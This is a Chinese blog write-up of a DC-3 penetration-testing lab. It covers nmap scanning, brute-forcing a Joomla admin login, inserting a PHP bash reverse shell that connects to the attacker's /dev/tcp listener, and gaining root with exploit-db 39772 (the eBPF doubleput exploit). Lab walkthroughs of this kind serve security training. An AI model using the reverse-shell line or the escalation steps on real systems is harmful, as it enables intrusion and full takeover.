2022春节一次完整的渗透测试-DC-3
DC靶场的下载、安装与访问在上一篇的文章中。2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-CSDN博客
https://blog.csdn.net/qq_38612882/article/details/122779202
靶场攻略:
1、使用nmap快速扫描的命令:
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24识别到靶场主机ip
2.使用命令:
nmap -A -p- -T4 192.168.120.135探测靶场突破口
如图,可以看到,开放了80端口-http服务
3.访问80端口,寻找进一步突破口。如果直接使用ip访问会跳转到http://dc-2/,而无法正常加载出来。所以需要我们去添加hosts文件,跳转域名来访问靶场ip。
Windows:可以访问本地hosts,打开C:\Windows\System32\drivers\etc,修改hosts文件
Linux:在/etc/hosts文件中添加域名。
打开浏览器,访问即可。
根据提示只有一个flag,并且需要拿到root权限才能得到。并且可以知道网站的CMS系统是Joomla。
4.使用dirb扫描http://dc-3/
dirb http://dc-3 /usr/share/wordlists/dirb/big.txt
访问
http://dc-3/administrator/
5.使用Brup进行爆破账号和密码。
结果账号是admin,密码是snoopy。登录成功。
在首页Templates下发现了线索
在Templates模版设置中,找到了,可编辑的php模版,这样就好弄了,在模版中添加反弹php的shell的语句,使用nc监听反弹的端口即可
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.120.129/1234 0>&1' ");?>
连接成功。查看文件内容,没有什么发现,直接在进入交互模式。
通过收集信息,知道靶场环境系统为ubuntu 16.04,使用searchsploit工具,寻找到合适的提权脚本。
如图,发现可以提权的漏洞利用,查看利用方式。
显示漏洞利用的完整路径
searchsploit 39772.txt -p
将39722.txt文件复制到root目录下,然后查看文件。
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root
通过阅读39772.txt的说明,知道需要下载一个提权脚本。
解压39772.zip
unzip 39772.zip
解压exploit.tar
// cd 39772
//lscrasher.tar exploit.tar//tar -xvf exploit.tar
//lscrasher.tar ebpf_mapfd_doubleput_exploit exploit.tar//cd ebpf_mapfd_doubleput_exploit
//lscompile.sh doubleput.c hello.c suidhelper.c
首先运行./compile.sh,得到一个doubleput执行文件,再运行doubleput文件之后,成功提权
执行编译文件
// ./compile.sh
// ./doubleput
// id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
//whoami
// cd /root
//ls
the-flag.txt// cat the-flag.txt
cat the-flag.txt
总结
在这个靶场中,用到的知识点有namp,暴力破解,brup软件,web目录扫描,反弹shell,提权,msf以及linux的一些基本命令。
2022春节一次完整的渗透测试-DC-3相关推荐
- 完整的渗透测试靶场通关
完整的渗透测试实例 作者:Slaine 编辑日期:2021.6.6 流程目录 前言 记得在2021年初就通关的这个的内网渗透靶场,只不过做完很久都后没怎么管,然后就去某CTF站刷了好一阵子题,排名从两 ...
- 渗透测试入门17之一次完整的渗透测试流程
一次完整的渗透测试流程 目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现 ...
- 完整的渗透测试实战纪实,低危漏洞组合成高危利用!
0x00一份好的报告标题也很重要哦 PS:原谅下图重码,此漏洞还没修复 报告详情 漏洞标题某国内大厂招聘系统测试 漏洞url* 0x01本次渗透流程 我们一步一步来, 首先我们从忘记密码那里开始,这里 ...
- 内网渗透思路06之一次完整的渗透测试
文章目录 零.本章所用技术 一.网络示意图 二.信息收集之端口探测 2.1端口探测 2.2探测出的端口服务 三.信息收集之子域名挖掘 四.漏洞测试 4.1 dedecms 安全检测 4.1.0 网站指 ...
- 一次完整的渗透测试仅供学习研究
声明:本文仅限学习研究讨论,切忌做非法乱纪之事 Web打点 渗透测试中,Web端最常见的问题大多出现在弱口令.文件上传.未授权.任意文件读取.反序列化.模版漏洞等方面.因此,我们着重围绕这些方面进行渗 ...
- 渗透测试入门25之一次完整的渗透测试实验
渗透测试的一般思路: 侦查,信息收集,漏洞扫描,漏洞利用,提升权限,保持连接 本次实验只用到信息收集,漏洞扫描及漏洞利用 攻击机:Kali2.0 64位(192.168.41.131) 目标机:Win ...
- 渗透测试入门11之一次完整的渗透测试实验
渗透测试的一般思路: 侦查,信息收集,漏洞扫描,漏洞利用,提升权限,保持连接 本次实验只用到信息收集,漏洞扫描及漏洞利用 攻击机:Kali2.0 64位(192.168.41.131) 目标机:Win ...
- 渗透测试初学者_渗透测试许可证:面向初学者的道德黑客课程
渗透测试初学者 A penetration test is an authorized cyberattack on a computer system, performed to evaluate ...
- Metasploit渗透测试框架
Metasploit渗透测试框架 渗透测试是一类有目的性的.针对目标机构计算机系统安全的监测评估方法.渗透测试可以发现系统的漏洞和安全机制方面的隐患,并以此进行渗透攻击来取得目标计算机的控制权.通过渗 ...
最新文章
- 【错误记录】Android Studio 编译报错 ( Could not find com.android.tools.build:gradle:4.2.1. )
- 循环链表C/C++实现(数据结构严蔚敏版)
- python爬虫天气预报难不难_python爬虫可以用来看天气预报吗?
- Android-DataBinding源码探究
- 洛谷P1880 [NOI1995]石子合并
- oracle desc能看约束,ORACLE 12C新特性-DESC显示不可见字段 | 信春哥,系统稳,闭眼上线不回滚!...
- UML及UML如何描述复杂系统的开发模型?
- python绝对值函数fabs_Python中abs()和math.fabs()区别
- 开发环境ubuntu16.04(ubuntu18.04)安装以后的初始化设置
- SharePoint2010内容类型剖析(三)
- Android开发系列之常用正则语法
- NEU 1683: H-Index
- 从零开始设计一款APP之Android设计规范篇
- 英雄连2一直显示连接relic服务器,英雄连2联机时出现PleaseWait问题的解决方法_英雄连2PleaseWait问题的解决方法_牛游戏网...
- 漂亮的字体 手写_20种漂亮的草书和手写字体可供下载
- 如何将base64码保存为图片
- Python-docx实战:同事要我帮忙补写178份日报!别吧
- quartz原理 java_Quartz原理解密
- VMware下安装win10启动后进入Boot Manger界面如何解决
- Android安装失败,安装包解析出错